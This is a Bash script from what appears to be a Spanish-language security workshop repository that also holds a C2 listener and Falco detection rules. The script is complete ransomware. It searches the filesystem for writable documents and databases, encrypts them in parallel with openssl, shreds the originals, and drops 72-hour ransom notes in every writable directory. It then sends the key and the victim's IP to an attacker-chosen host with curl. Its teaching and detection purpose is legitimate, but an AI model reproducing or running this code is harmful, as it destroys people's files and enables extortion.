anti
ae0104b200
Scripts ofensivos (xargs, tarbulk, noxargs), C2 listener, Falco detection rules, slides md + pptx, y estructura del workshop.
55 lines
1.6 KiB
Bash
55 lines
1.6 KiB
Bash
#!/bin/false
|
|
# /bin/false porque no quiero ejecutar esto :)
|
|
|
|
IP=$1
|
|
KEY=$(openssl rand -hex 32)
|
|
|
|
function get_writeable_dirs() {
|
|
mapfile -d '' WRITEABLE_DIRS < <(find / -type d -perm -0002 -print0)
|
|
}
|
|
|
|
function get_interesting_files() {
|
|
mapfile -d '' TARGETS < <(find / -type f -writable \( -name "*.txt" -o -name "*.pdf" -o -name "*.docx" -o -name "*.db" \) -print0)
|
|
}
|
|
|
|
function send_key() {
|
|
curl -sk "http://$IP/?k=$KEY&v=$(curl -s4 ifconfig.me)"
|
|
}
|
|
|
|
function make_readme() {
|
|
printf '%s\0' "${WRITEABLE_DIRS[@]}" | \
|
|
xargs -0 -I% sh -c \
|
|
'echo "Tus archivos han sido cifrados. Tienes 72 horas para pagar." > "%/LEEME_URGENTE.txt"'
|
|
}
|
|
|
|
function encrypt() {
|
|
printf '%s\0' "${TARGETS[@]}" | \
|
|
xargs -0 -I% -P"36" sh -c \
|
|
'openssl enc -aes-256-cbc -pbkdf2 -pass pass:'"$KEY"' -in "$1" -out "$1.enc" && shred -u "$1"' \
|
|
_ %
|
|
}
|
|
|
|
function main() {
|
|
echo "[*] Reconocimiento: directorios escribibles..."
|
|
time get_writeable_dirs
|
|
echo "[+] ${#WRITEABLE_DIRS[@]} directorios encontrados."
|
|
|
|
echo "[*] Reconocimiento: archivos objetivo..."
|
|
time get_interesting_files
|
|
echo "[+] ${#TARGETS[@]} archivos encontrados."
|
|
|
|
echo "[*] Cifrando (xargs -P$(nproc), paralelo)..."
|
|
time encrypt
|
|
echo "[+] Cifrado completo."
|
|
|
|
echo "[*] Depositando notas de rescate..."
|
|
time make_readme
|
|
echo "[+] Notas en ${#WRITEABLE_DIRS[@]} directorios."
|
|
|
|
echo "[*] Exfiltrando clave a $IP..."
|
|
send_key
|
|
echo "[+] Hecho."
|
|
}
|
|
|
|
main "$@"
|